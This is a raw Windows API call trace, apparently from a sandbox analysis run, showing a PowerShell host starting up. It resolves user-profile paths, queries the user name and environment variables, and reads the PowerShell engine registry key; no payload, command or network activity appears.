	[0219.347] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.347] SetErrorMode (uMode=0x1) returned 0x1
	[0219.347] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.348] SetErrorMode (uMode=0x1) returned 0x1
	[0219.348] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.348] SetErrorMode (uMode=0x1) returned 0x1
	[0219.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.348] SetErrorMode (uMode=0x1) returned 0x1
	[0219.348] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xdd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.348] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xdd190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.348] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.348] SetErrorMode (uMode=0x1) returned 0x1
	[0219.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.348] SetErrorMode (uMode=0x1) returned 0x1
	[0219.348] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.349] SetErrorMode (uMode=0x1) returned 0x1
	[0219.349] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.349] SetErrorMode (uMode=0x1) returned 0x1
	[0219.349] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0220.265] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0220.265] SetErrorMode (uMode=0x1) returned 0x1
	[0220.265] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xdd7a0 | out: lpFileInformation=0xdd7a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0220.265] SetErrorMode (uMode=0x1) returned 0x1
	[0226.330] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8710e0, nSize=0xddb08 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xddb08) returned 0x1
	[0226.332] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xddb48 | out: lpBuffer="aETAdzjz", pcbBuffer=0xddb48) returned 1
	[0226.332] CoTaskMemFree (pv=0x288f70) 
	[0226.334] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2efbaa8*="Available", lpRawData=0x2efb838) returned 1
	[0226.993] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0226.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.993] CoTaskMemFree (pv=0x27d0e0) 
	[0226.995] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0226.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.995] CoTaskMemFree (pv=0x27d0e0) 
	[0226.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.001] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0227.001] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0227.001] CoTaskMemFree (pv=0x27d0e0) 
	[0227.001] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0227.001] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0227.001] CoTaskMemFree (pv=0x27d0e0) 
	[0227.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.003] GetCurrentProcessId () returned 0xbc4
	[0227.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.006] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xddb28 | out: phkResult=0xddb28*=0x37c) returned 0x0
	[0227.007] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xddaac, lpData=0x0, lpcbData=0xddaa8*=0x0 | out: lpType=0xddaac*=0x1, lpData=0x0, lpcbData=0xddaa8*=0x56) returned 0x0
	[0227.007] CoTaskMemAlloc (cb=0x5a) returned 0x1b851a10
	[0227.007] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdda7c, lpData=0x1b851a10, lpcbData=0xdda78*=0x56 | out: lpType=0xdda7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xdda78*=0x56) returned 0x0
	[0227.007] CoTaskMemFree (pv=0x1b851a10) 
	[0227.007] RegCloseKey (hKey=0x37c) returned 0x0
	[0227.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.453] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0228.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.453] CoTaskMemFree (pv=0x27d0e0) 
	[0228.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
